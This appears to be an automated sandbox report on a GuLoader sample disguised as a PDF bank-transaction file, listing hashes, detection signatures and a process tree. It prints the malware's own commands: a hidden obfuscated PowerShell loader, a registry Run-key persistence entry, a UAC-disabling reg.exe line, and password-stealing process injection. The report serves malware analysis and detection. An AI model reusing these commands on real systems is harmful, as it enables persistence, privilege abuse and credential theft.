Overview
overview
10Static
static
3pko_trans_...df.exe
windows7-x64
10pko_trans_...df.exe
windows10-2004-x64
8$PLUGINSDI...ge.dll
windows7-x64
1$PLUGINSDI...ge.dll
windows10-2004-x64
1$PLUGINSDI...fo.dll
windows7-x64
3$PLUGINSDI...fo.dll
windows10-2004-x64
3$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
10-07-2024 08:38
Static task
static1
Behavioral task
behavioral1
Sample
pko_trans_details_20240710_105339·pdf.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
pko_trans_details_20240710_105339·pdf.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240708-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240709-en
General
-
Target
pko_trans_details_20240710_105339·pdf.exe
-
Size
477KB
-
MD5
c601d5e720a191b1e304c8bcbf63b675
-
SHA1
80133fe77b17d44886e6201d7723be90489a55d2
-
SHA256
d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c
-
SHA512
2a78f640f01f365d23bb45bfc96e6900eb1814804bbf905876ac9d6e9353fd3e648efc08858b9e29e41eb6c2262e528d34b00d847524aeeabf41eb319792566f
-
SSDEEP
6144:39X0GFlllllllqllllllllllllhllllYllltlld0wz/ypzAJP8xvP2nWaLcAqRFk:R0Nwzy4EP2nWaPqzJgBKjYl92gCU3Bbl
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/1764-73-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/1140-74-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1140-74-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/1764-73-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/1728-76-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 5 2856 powershell.exe 7 2856 powershell.exe 9 2856 powershell.exe 11 2856 powershell.exe 13 2856 powershell.exe 15 2856 powershell.exe 16 2856 powershell.exe 18 2856 powershell.exe 19 2856 powershell.exe 20 2856 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 4 IoCs
Processes:
pko_trans_details_20240710_105339·pdf.exepid process 2812 pko_trans_details_20240710_105339·pdf.exe 2812 pko_trans_details_20240710_105339·pdf.exe 2812 pko_trans_details_20240710_105339·pdf.exe 2812 pko_trans_details_20240710_105339·pdf.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
powershell.exepid process 2856 powershell.exe 2856 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
powershell.exepid process 2856 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 2856 set thread context of 1140 2856 powershell.exe powershell.exe PID 2856 set thread context of 1764 2856 powershell.exe powershell.exe PID 2856 set thread context of 1728 2856 powershell.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepid process 2856 powershell.exe 2856 powershell.exe 2856 powershell.exe 2856 powershell.exe 2856 powershell.exe 2856 powershell.exe 2856 powershell.exe 2856 powershell.exe 1140 powershell.exe 1140 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
powershell.exepid process 2856 powershell.exe 2856 powershell.exe 2856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 1728 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 2856 powershell.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
pko_trans_details_20240710_105339·pdf.exepowershell.execmd.execmd.exedescription pid process target process PID 2812 wrote to memory of 2856 2812 pko_trans_details_20240710_105339·pdf.exe powershell.exe PID 2812 wrote to memory of 2856 2812 pko_trans_details_20240710_105339·pdf.exe powershell.exe PID 2812 wrote to memory of 2856 2812 pko_trans_details_20240710_105339·pdf.exe powershell.exe PID 2812 wrote to memory of 2856 2812 pko_trans_details_20240710_105339·pdf.exe powershell.exe PID 2856 wrote to memory of 2076 2856 powershell.exe cmd.exe PID 2856 wrote to memory of 2076 2856 powershell.exe cmd.exe PID 2856 wrote to memory of 2076 2856 powershell.exe cmd.exe PID 2856 wrote to memory of 2076 2856 powershell.exe cmd.exe PID 2076 wrote to memory of 264 2076 cmd.exe reg.exe PID 2076 wrote to memory of 264 2076 cmd.exe reg.exe PID 2076 wrote to memory of 264 2076 cmd.exe reg.exe PID 2076 wrote to memory of 264 2076 cmd.exe reg.exe PID 2856 wrote to memory of 2936 2856 powershell.exe cmd.exe PID 2856 wrote to memory of 2936 2856 powershell.exe cmd.exe PID 2856 wrote to memory of 2936 2856 powershell.exe cmd.exe PID 2856 wrote to memory of 2936 2856 powershell.exe cmd.exe PID 2936 wrote to memory of 596 2936 cmd.exe reg.exe PID 2936 wrote to memory of 596 2936 cmd.exe reg.exe PID 2936 wrote to memory of 596 2936 cmd.exe reg.exe PID 2936 wrote to memory of 596 2936 cmd.exe reg.exe PID 2856 wrote to memory of 1140 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1140 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1140 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1140 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1140 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1764 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1764 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1764 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1764 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1764 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1728 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1728 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1728 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1728 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 1728 2856 powershell.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"3⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"4⤵
- Adds Run key to start application
- Modifies registry key
PID:264 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- Modifies registry key
PID:596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\ctbyqqvqppawzvpxqeskfzzfkufbvjjw"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\mwpi"3⤵
- Accesses Microsoft Outlook accounts
PID:1764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\pqubsbqd"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1728
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
130B
MD5916d87716e284ad70028f968c063d37c
SHA17d66790055f596e81ad939ad271b6b9d21fed2ae
SHA25669bc9bf9329f98e8ab8b196e477bfd84205271f8a43c87d898ea4c55c3da6c02
SHA5126019cadabf6959601384e5fb8d79a0915d65206ce94b91cf31574119d04dae2026d3106bc2334f571182db64864a92cf9120adf66aadaa3c94d7f492da5a2cb4
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
67KB
MD5bf1ebfd1285dd7ef43a587e9f51a8e33
SHA11dede4026611e9f40c91d9bbe406a06b2fd8bfa4
SHA256de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff
SHA5123b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389
-
Filesize
310KB
MD5afc1982fff88592a55312010cfc773c6
SHA1c57e918c5149ca9c2a331a78ecef84ffc667feb7
SHA25602a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0
SHA512f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e
-
Filesize
7KB
MD5521df745a41f0b8164ffd01717cacbba
SHA1dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74
SHA256dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b
SHA512c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe
-
Filesize
4KB
MD5acbda33dd5700c122e2fe48e3d4351fd
SHA12c154baf7c64052ee712b7cdf9c36b7697dd3fc8
SHA256943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0
SHA512d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd
-
Filesize
9KB
MD51c8b2b40c642e8b5a5b3ff102796fb37
SHA13245f55afac50f775eb53fd6d14abb7fe523393d
SHA2568780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c
SHA5124ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57